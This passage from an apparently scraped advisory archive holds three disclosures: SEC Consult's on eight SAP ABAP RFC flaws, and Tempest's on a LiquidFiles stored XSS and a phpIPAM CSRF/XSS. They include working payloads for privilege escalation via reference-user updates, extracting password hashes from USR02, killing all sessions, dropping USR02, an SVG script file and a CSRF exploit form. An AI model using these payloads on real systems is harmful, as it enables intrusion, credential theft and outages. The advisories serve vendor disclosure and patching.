https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/<br /> en-US/797de8aa42e24916953c4bb3d983662d.html<br />[4] https://developers.sap.com/topics/abap-platform.html<br /><br /><br />Business recommendation:<br />------------------------<br />By exploiting the vulnerabilities documented in this advisory, privileged<br />attackers can take complete control of affected application servers. Thus,<br />successful exploitation can enable fraud, sabotage or data theft while<br />affecting confidentiality, integrity, and availability of business data.<br /><br />SEC Consult recommends to implement security notes 2958563, 2973735,<br />2993132, 2986980, 2999854, 3002517, 3048657 where the documented issues<br />are fixed according to the vendor. We advise installing the corrections<br />as a matter of priority to keep business-critical data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Advanced Business Application Programming (ABAP)® is a proprietary<br />programming language by SAP SE. In common with every other programming<br />language, ABAP can be susceptible to software vulnerabilities ranging<br />from missing or improper authorization checks to inadequate input<br />validation and output sanitization. Of particular concern are injection<br />vulnerabilities, which can jeopardize the overall system security.<br /><br />Remote Function Call (RFC) is a proprietary network protocol by SAP SE.<br />Comparable to application programming interfaces (APIs), SAP systems<br />come with thousands of built-in function modules implemented in ABAP. RFC<br />allows remote-enabled functions to be accessed via the network. This makes<br />it possible to decentralize business applications even across system<br />boundaries. External programs and external clients can make use of RFC<br />connections to interact with an SAP system via libraries (e.g. NW RFC SDK)<br />provisioned by SAP SE.<br /><br />This advisory covers multiple critical vulnerabilities discovered in<br />the ABAP® coding of standard function modules. These are part of different<br />software components that build upon the bedrock products SAP® Application<br />Server ABAP and ABAP® Platform.<br /><br />1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver<br /> (ABAP Server) and ABAP Platform<br /><br /> Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4<br /> of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable<br /> to ABAP code injection bugs allowing to execute arbitrary ABAP<br /> code. Successful exploitation leads to full system compromise.<br /><br />2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP<br /> and S/4 HANA (DMIS)<br /><br /> Function module CNV_MBT_SEL_STRING_RETURN of function group<br /> CNV_MBT_SEL is vulnerable to an ABAP code injection bug allowing to<br /> embed arbitrary code into the ABAP Repository. An attacker can abuse<br /> this bug by invoking the function remotely via the RFC protocol.<br /> Successful exploitation leads to full system compromise.<br /><br />3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver<br /> AS ABAP and SAP S4 HANA (SAP Landscape Transformation)<br /><br /> Function module CNV_GET_USERS_FOR_APP_SERVER of function group<br /> CNV_00001_HELP does not perform any programmatically implemented<br /> authorization check. An attacker can abuse this bug by invoking<br /> the function remotely via the RFC protocol. Successful exploitation<br /> allows to retrieve internal information and to make a targeted SAP<br /> system completely unavailable to its intended users. The latter<br /> is to be considered as a Denial of Service (DoS) attack.<br /><br />4) [CVE-2021-21468] Missing Authorization Check in SAP Business<br /> Warehouse (Database Interface)<br /><br /> Function module RSDL_DB_GET_DATA_BWS of function group RSDL does<br /> not perform any programmatically implemented authorization check.<br /> An attacker can abuse this bug by invoking the function remotely<br /> via the RFC protocol. Successful exploitation allows to read out<br /> the entire database including cross-client data access.<br /><br />5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP<br /> Business Warehouse (Database Interface)<br /><br /> Function module RSDL_DB_GET_DATA_BWS of function group RSDL is<br /> vulnerable to a native SQL injection (ADBC) bug allowing to execute<br /> arbitrary SQL commands at database level. An attacker can abuse<br /> this bug by invoking the function remotely via the RFC protocol.<br /> Successful exploitation leads to full system compromise.<br /><br />6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business<br /> Warehouse and SAP BW/4HANA<br /><br /> Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE<br /> is vulnerable to an ABAP code injection bug allowing to embed<br /> arbitrary code into the ABAP Repository. An attacker can abuse this<br /> bug by invoking the function remotely via the RFC protocol. Successful<br /> exploitation leads to full system compromise.<br /><br />7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP<br /> and ABAP Platform<br /><br /> Function module SRM_RFC_SUBMIT_REPORT of function group SRM_REP does not<br /> enforce proper authorization checks for critical use of a dynamic program<br /> call. An attacker can abuse this bug by invoking the function remotely<br /> via the RFC protocol. Successful exploitation allows an attacker to<br /> execute existing ABAP reports without holding sufficient authorizations.<br /><br />8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP<br /> (Reconciliation Framework)<br /><br /> Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains<br /> a code injection vulnerability with a limited exploitation primitive. An<br /> attacker can abuse this bug to delete critical system tables (e.g. USR02),<br /> making the targeted SAP system completely unavailable to its intended users.<br /><br /><br />Proof of concept:<br />-----------------<br /><br />1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver<br /> (ABAP Server) and ABAP Platform<br /><br /> The vulnerable functions make use of the GENERATE SUBROUTINE POOL<br /> instruction by providing source code that is created dynamically<br /> using untrusted user input. As there is no input validation or<br /> output sanitization, an attacker can inject malicious ABAP code<br /> through specific import parameters. This code gets executed on the<br /> fly by the application server in the course of execution of the<br /> functions.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Parameter: I_TABLNM<br /> Value: USR02<br /><br /> Import Table: I_T_SELECT_FIELDS<br /> ╒═══════════════════════════════════════════════════════════════╕<br /> │ RSD_FIELDNM │<br /> ╞═══════════════════════════════════════════════════════════════╡<br /> │ BNAME │<br /> ╘═══════════════════════════════════════════════════════════════╛<br /> Import Table: I_T_WHERE_COND<br /> ╒═══════════╤══════╤════════════════════════════════════════════╕<br /> │ FIELDNM │ OP │ LOW │<br /> ╞═══════════╪══════╪════════════════════════════════════════════╡<br /> │ BNAME │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET │<br /> │ │ │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER │<br /> ╘═══════════╧══════╧════════════════════════════════════════════╛<br /><br /><br />2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP<br /> and S/4 HANA (DMIS)<br /><br /> The vulnerable function makes use of the INSERT REPORT instruction<br /> by providing source code that is created dynamically using untrusted<br /> user input. As there is no input validation or output sanitization,<br /> an attacker can inject malicious ABAP code through specific import<br /> parameters. Inserted code may be executed by chaining this bug with<br /> CVE-2021-21473.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Parameter: TABNAME<br /> Value: USR02<br /><br /> Import Table: IMT_SELSTRING<br /> ╒══════════════════════════════════════════════════════════════╕<br /> │ LINE │<br /> ╞══════════════════════════════════════════════════════════════╡<br /> │ BNAME = 'TEST'. ENDSELECT. │<br /> ├──────────────────────────────────────────────────────────────┤<br /> │ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │<br /> ├──────────────────────────────────────────────────────────────┤<br /> │ SELECT * FROM USR02 │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /><br />3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver<br /> AS ABAP and SAP S4 HANA (SAP Landscape Transformation)<br /><br /> The vulnerable function does not perform any explicit authorization<br /> check. Depending on a specific import parameter, the function leaks<br /> active logon sessions (opcode 02) or terminates all active logon<br /> sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function<br /> periodically prevents users from logging into the application server.<br /><br /> The following payload exploits the bug to trigger the information<br /> disclosure and enumerate active user sessions:<br /><br /> Import Parameter: MODE<br /> Value: 1<br /><br /> The following payload exploits the bug to terminate all active user<br /> sessions:<br /><br /> Import Parameter: MODE<br /> Value: 2<br /><br /><br />4) [CVE-2021-21468] Missing Authorization Check in SAP Business<br /> Warehouse (Database Interface)<br /><br /> The vulnerable function does not perform any explicit authorization<br /> check. It uses predefined classes and methods from the ABAP Database<br /> Connectivity (ADBC) framework to execute native SQL queries at database<br /> level. Depending on specific import parameters, this allows to read out<br /> arbitrary table data including user master records or secure storages<br /> (e.g. RSECTAB).<br /><br /> The following payload exploits the bug to exfiltrate user password<br /> hashes:<br /><br /> Import Table: I_S_TABSEL<br /> ╒══════════════════════════════════════════════════════════════╕<br /> │ NAME │<br /> ╞══════════════════════════════════════════════════════════════╡<br /> │ USR02 │<br /> ╘══════════════════════════════════════════════════════════════╛<br /> Import Table: I_S_DBCON<br /> ╒══════════════════════════════════════════════════════════════╕<br /> │ CON_NAME │<br /> ╞══════════════════════════════════════════════════════════════╡<br /> │ <Database Connection String> (e.g. DEFAULT) │<br /> ╘══════════════════════════════════════════════════════════════╛<br /> Import Table: I_T_DBFIELDS<br /> ╒═══════════════╤═════════╤════════════════════════════════════╕<br /> │ NAME │ TYPE │ LENGTH │<br /> ╞═══════════════╪═════════╪════════════════════════════════════╡<br /> │ BNAME │ CHAR255 │ 000255 │<br /> ├───────────────┼─────────┼────────────────────────────────────┤<br /> │ PWDSALTEDHASH │ CHAR255 │ 000255 │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /><br />5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP<br /> Business Warehouse (Database Interface)<br /><br /> The vulnerable function does not perform any input validation or<br /> output sanitization on import parameters that can be used to define<br /> conditional SQL statements. This allows to inject arbitrary SQL<br /> commands that get executed natively at database level in the course<br /> of execution of the function.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Table: I_S_TABSEL<br /> ╒══════════════════════════════════════════════════════════════╕<br /> │ NAME │<br /> ╞══════════════════════════════════════════════════════════════╡<br /> │ USR02 │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /> Import Table: I_S_DBCON<br /> ╒══════════════════════════════════════════════════════════════╕<br /> │ CON_NAME │<br /> ╞══════════════════════════════════════════════════════════════╡<br /> │ <Database Connection String> (e.g. DEFAULT) │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /> Import Table: I_T_DBFIELDS<br /> ╒═══════════════╤═════════╤════════════════════════════════════╕<br /> │ NAME │ TYPE │ LENGTH │<br /> ╞═══════════════╪═════════╪════════════════════════════════════╡<br /> │ BNAME │ CHAR255 │ 000255 │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /> Import Table: I_T_SELECT<br /> ╒══════════════════════╤════════╤══════════════════════════════╕<br /> │ FIELDNM │ OPTION │LOW │<br /> ╞══════════════════════╪════════╪══════════════════════════════╡<br /> │ BNAME │ EQ │'';UPDATE USREFUS SET REFUSER │<br /> │ │ │='DDIC' WHERE '1 │<br /> ├──────────────────────┼────────┼──────────────────────────────┤<br /> │ ' = '1 AND' AND BNAME│ EQ │'ATTACKER'; │<br /> ╘══════════════════════════════════════════════════════════════╛<br /><br /><br />6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business<br /> Warehouse and SAP BW/4HANA<br /><br /> The vulnerable function makes use of the INSERT REPORT instruction<br /> by providing source code that is created dynamically using untrusted<br /> user input. As there is no input validation or output sanitization,<br /> an attacker can inject malicious ABAP code through specific import<br /> parameters. Inserted code may be executed by chaining this bug with<br /> CVE-2021-21473.<br /><br /> The following payload exploits the bug to escalate privileges via<br /> reference user assignment:<br /><br /> Import Parameter: I_TABLE_NAME<br /> Value: INJECTION<br /><br /> Import Parameter: I_DEBUG_SUFFIX<br /> Value: SAP<br /><br /> Import Table: I_T_RANGE_STRING<br /> ╒═══════════╤═════════════════════════════════════╤════════════╕<br /> │ CHANM │ LOW │ HIGH │<br /> ╞═══════════╪═════════════════════════════════════╪════════════╡<br /> │ BNAME │ '. UPDATE USREFUS SET REFUSER │ '. EXIT. " │<br /> │ │ = 'DDIC' WHERE BNAME = 'ATTACKER │ │<br /> ╘═══════════╧═════════════════════════════════════╧════════════╛<br /><br /><br />7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP<br /> and ABAP Platform<br /><br /> The vulnerable function uses a dynamically generated program name (based<br /> on data from untrusted sources) in a SUBMIT call. No authorization checks<br /> are programmatically enforced. Thus, a remote, unauthorized attacker can<br /> leverage this function to start any existing ABAP report by providing the<br /> respective report name in the import parameter REPORTNAME.<br /><br /><br />8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP<br /> (Reconciliation Framework)<br /><br /> The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction<br /> in form 'get_dynamic_fields' by providing source code that is created<br /> dynamically using untrusted user input. As there is no input validation or<br /> output sanitization, an attacker can inject malicious ABAP code through specific<br /> import parameters. These parameters are limited in size due to their variable<br /> type. This restricts an attacker in exploitation scenarios. However, it is still<br /> possible, for example, to delete critical system tables by exploiting this bug.<br /><br /> The following payload exploits the bug to drop table USR02, leading to a complete<br /> loss of availability of the target system:<br /><br /> Import Parameter: RTABNAME<br /> Value: X. EXEC SQL. DROP TABLE USR02-<br /><br /> Import Parameter: RFIELDNAME<br /> Value: ENDEXEC<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />All tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04<br />and ABAP Platform 1909. No additional testing on other releases has been<br />carried out. According to the vendor the following releases and versions<br />are affected by the discovered vulnerabilities:<br /><br />1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions<br /> - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752,<br /> 753, 754, 755<br /> Components: SAP_BW, SAP_BW_VIRTUAL_COMP<br /><br />2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640,<br /> 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752,<br /> 2020; SAP S4 HANA(DMIS), Versions - 101, 102, 103, 104, 105<br /> Components: DMIS, S4CORE<br /><br />3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS),<br /> Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710,<br /> 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA<br /> (SAP Landscape Transformation), Versions - 101, 102, 103,<br /> 104, 105<br /> Components: DMIS, S4CORE<br /><br />4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740,<br /> 750, 751, 752, 753, 754, 755, 782<br /> Components: SAP_BW, SAP_BW_VIRTUAL_COMP<br /><br />5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740,<br /> 750, 751, 752, 753, 754, 755, 782<br /> Components: SAP_BW, SAP_BW_VIRTUAL_COMP<br /><br />6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730,<br /> 731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200<br /> Components: SAP_BW, DW4CORE<br /><br />7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700,<br /> 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755<br /> Components: SAP_BASIS<br /><br />8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701,<br /> 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B,<br /> 75C, 75D, 75E, 75F<br /> Components: SAP_ABA<br /><br /><br />Vendor contact timeline:<br />------------------------<br />The following timelines have been split for each CVE/vulnerability, as different<br />contacts were responsible. All identified vulnerabilities have been fixed by now<br />by SAP and SEC Consult releases this security advisory adhering to the<br />responsible disclosure policy.<br /><br /><br />CVE-2020-6318<br />--------------------------------<br />2020-08-12 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-08-13 | Vendor confirms receipt and assigns security incident number<br /> #2080354772.<br />2020-08-19 | Vendor confirms vulnerability.<br />2020-08-24 | Vendor informs about patch development strategy.<br />2020-09-07 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2020-09-08 | Vendor releases patch with SAP Security Note 2958563.<br /><br /><br />CVE-2020-26808<br />--------------------------------<br />2020-09-24 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-09-25 | Vendor confirms receipt and assigns security incident number<br /> #2070354293.<br />2020-10-20 | Contacting vendor to request progress information.<br />2020-10-21 | Vendor confirms vulnerability and states that a fix is in<br /> development.<br />2020-11-09 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2020-11-10 | Vendor releases patch with SAP Security Note 2973735.<br /><br /><br />CVE-2020-26832<br />--------------------------------<br />2020-10-23 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-10-26 | Vendor confirms receipt and assigns security incident number<br /> #2070432866.<br />2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6.<br />2020-11-23 | Vendor asks for exploit script shown in the initial report.<br />2020-11-24 | Providing the requested script via encrypted PGP mail.<br />2020-12-07 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2020-12-08 | Vendor releases patch with SAP Security Note 2993132.<br /><br /><br />CVE-2021-21465 / CVE-2021-21468<br />--------------------------------<br />2020-10-27 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-10-29 | Vendor confirms receipt and assigns separated security incident<br /> numbers #2070446047 and #2070446050.<br />2020-11-06 | Vendor confirms vulnerability and predicts patches to be released<br /> on December Patch Tuesday 2020.<br />2020-11-18 | Vendor confirms that they are still on track for December Patch<br /> Tuesday 2020.<br />2020-12-01 | Vendor informs that patch needs to be postponed to January Patch<br /> Tuesday 2021.<br />2021-01-08 | Vendor informs about release of patches and clarifies that a single<br /> security note will fix both issues. Additional information about<br /> CVSS scores is provided.<br />2021-01-11 | Vendor informs about release of the patches, registration of CVE<br /> numbers and corresponding security note.<br />2021-01-12 | Vendor releases patches with SAP Security Note 2986980.<br /><br /><br />CVE-2021-21466 / CVE-2021-21473<br />--------------------------------<br />2020-11-25 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2020-11-27 | Vendor confirms receipt and assigns security incident number<br /> #2080396648.<br />2021-01-04 | Vendor confirms vulnerability and states that they are working<br /> on a fix. Additional information is provided detailing on that<br /> they will split the reported finding into two separated security<br /> issues and security incident numbers #2080396648 and #2080412695.<br />2021-01-11 | Vendor informs about release of the first patch, registration of CVE<br /> number and corresponding security note.<br />2021-01-11 | Vendor informs about patch release for the first issue. Additional<br /> information is provided describing that a patch for the second issue<br /> is still in development.<br />2021-01-12 | Vendor releases first patch with SAP Security Note 2999854.<br />2021-05-07 | Asking vendor for update regarding the second issue.<br />2021-05-11 | Vendor informs that fix is in progress and note will be released soon.<br />2021-06-07 | Vendor informs about release of the second patch, registration of CVE<br /> number and corresponding security note.<br />2021-06-08 | Vendor releases second patch with SAP Security Note 3002517.<br /><br /><br />CVE-2021-33678<br />--------------------------------<br />2021-02-01 | Contacting vendor with detailed report through vulnerability<br /> submission web form.<br />2021-02-03 | Vendor confirms receipt and assigns security incident number<br /> #2180074995.<br />2021-05-07 | Asking vendor for update.<br />2021-05-11 | Vendor informs that fix is in progress.<br />2021-07-12 | Vendor informs about release of the patch, registration of CVE<br /> number and corresponding security note.<br />2021-07-13 | Vendor releases patch with SAP Security Note 3048657.<br /><br /><br />Solution:<br />---------<br />SAP SE reacted promptly to our findings. Product Security Incident Response<br />Team (PSRT) and engineers released patches in a timely manner for each of<br />the reported issues. These patches are available in form of SAP Security<br />Notes which can be accessed via the SAP Customer Launchpad [5]. More<br />information can also be found at the Official SAP Product Security Response<br />Space [6].<br /><br />The following Security Notes need to be implemented:<br /><br />2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657<br /><br />[5] https://launchpad.support.sap.com/#/securitynotes<br />[6] https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg, A. Meier / @2022<br /><br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-12/2021<br />]==========================<br /><br />LiquidFiles - 3.4.15<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgements<br /> * References<br /><br />=====[ Vulnerability<br />Information]=============================================<br /> * Class: Improper Neutralization of Input During Web Page Generation<br /> ('Cross-site Scripting') [CWE-79]<br /><br /> * CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N<br /><br />=====[ Overview]========================================================<br /> * System affected : LiquidFiles<br /> * Software Version : Version - 3.4.15<br /> * Impacts :<br /> * XSS: LiquidFiles 3.4.15 has stored XSS through the "send email"<br />functionality when sending a file via email to an administrator. When a<br />file has no extension and contains malicious HTML / JavaScript content<br />(such as SVG with HTML content), the payload is executed upon a click. This<br />is fixed in 3.5.<br /><br /><br /><br />=====[ Detailed<br />description]=================================================<br /><br />* Stored XSS at [http://localhost:8080/message/new]:<br /><br />* Steps to reproduce<br /><br />1 - Create a file without extension, with the content below inside<br />```<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "<br />http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,100 100,0" fill="#0000FF"<br />stroke="#0000FF"/><br /> <script type="text/javascript"><br /> alert(1);<br /> </script><br /></svg><br />```<br />2 - With an external user send an email with that file (without any<br />extension) to admin or someone.<br /><br />3 - With the admin account go to the menu click on "Data", inside the<br />"Data" menu click at "Messages", and select the message that you sent at<br />step 2. At the table click on the filename row over your file, the<br />javascript code will be executed.<br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br />11/Jan/2021 - Responsible disclosure was initiated with the vendor.<br />12/Jan/2021 - LiquidFiles Support confirmed the issue;<br />18/Fev/2021 - The vendor fixed the vulnerability the second stored XSS's<br />06/Apr/2021 - CVEs was assigned and reserved as CVE-2021-30140<br /><br />=====[ Thanks & Acknowledgements]========================================<br /> * Tempest Security Intelligence [5]<br /><br />=====[ References ]=====================================================<br /><br />[1][ [<br />https://cwe.mitre.org/data/definitions/79.html]|https://cwe.mitre.org/data/definitions/79.html<br />]]<br />[2][ [https://gist.github.com/rodnt/9f7d368fac38cafa7334598ec94fb167]]<br />[3][ [https://www.tempest.com.br|<br />https://www.tempest.com.br/]|https://www.tempest.com.br/]<br /><br />=====[ EOF ]===========================================================<br />--<br /><br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-03/2022<br />]==========================<br /><br />PHPIPAM - Version 1.4.4<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents ]==================================================<br /><br />* Overview<br />* Detailed description<br />* Timeline of disclosure<br />* Thanks & Acknowledgements<br />* References<br /><br />=====[ Vulnerability Information<br />]=============================================<br /><br />* Class: Improper Neutralization of Input During Web Page Generation<br />('Cross-Site Scripting') [CWE-79]<br />* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L<br /><br />* Class: Cross-Site Request Forgery (CSRF) [CWE-352]<br />* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L<br /><br /><br />=====[ Overview ]========================================================<br /><br /> * System affected: PHPIPAM - Version 1.4.4<br /> * Software Version: Version 1.4.4 (other versions may also be affected).<br /> * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF)<br />and Cross-Site Scripting (XSS) via<br />app/admin/subnets/find_free_section_subnets.php. An attacker can exploit<br />this by injecting javascript code to coerce an admin user into performing<br />unintended actions.<br /><br />=====[ Detailed description<br />]=================================================<br /><br />The html codes below exploit vulnerabilities in the same way due to the<br />fact that both forms do not contain CSRF tokens and are vulnerable to XSS<br />attacks. Then an attacker can host the forms on their malicious host and<br />trick an administrator into visiting your page. If successful, the<br />javascript code will execute.<br /><br />* [app/admin/subnets/find_free_section_subnets.php]<br /><br /><html><br /> <body><br /> <h1> Exploit PHPIPAM </h1><br /> <script>history.pushState('', '', '/')</script><br /> <form action="<br />http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php"<br />method="POST"><br /> <input type="hidden" name="container" value="body" /><br /> <input type="hidden" name="placement" value="top" /><br /> <input type="hidden" name="sectionid" value="2'><input<br />onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>"<br />/><br /> <input type="hidden" name="original-title" value="Search for free<br />subnets in section " /><br /> <input type="submit" value="Exploit" /><br /> </form><br /> </body><br /></html><br /><br /><br /><br />=====[ Timeline of disclosure<br />]===============================================<br /><br />13/Jan/2022 - Responsible disclosure was initiated with the vendor;<br /><br />14/Jan/2022 - PHPIPAM confirmed the issues;<br /><br />17/Jan/2022 - The vendor fixed the issues XSS and CSRF;<br /><br />24/Mar/2022 - CVE reserved as CVE-2021-46426;<br /><br />25/Mar/2022 - CVE assigned [5].<br /><br />=====[ Thanks & Acknowledgements ]========================================<br /><br />* Tempest Security Intelligence [4]<br /><br />=====[ References ]=====================================================<br /><br />[1] [<br />https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html<br />]<br /><br />[2] [<br />https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html<br />]<br /><br />[3] [<br />https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351|https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351<br />]<br /><br />[4] [https://www.tempest.com.br|https://www.tempest.com.br/]<br /><br />[5] [<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426<br />]<br /><br />[6][ Thanks to Celso (CGB) =)]<br /><br />=====[ EOF ]===========================================================<br /><br />--<br /><br /></code></pre>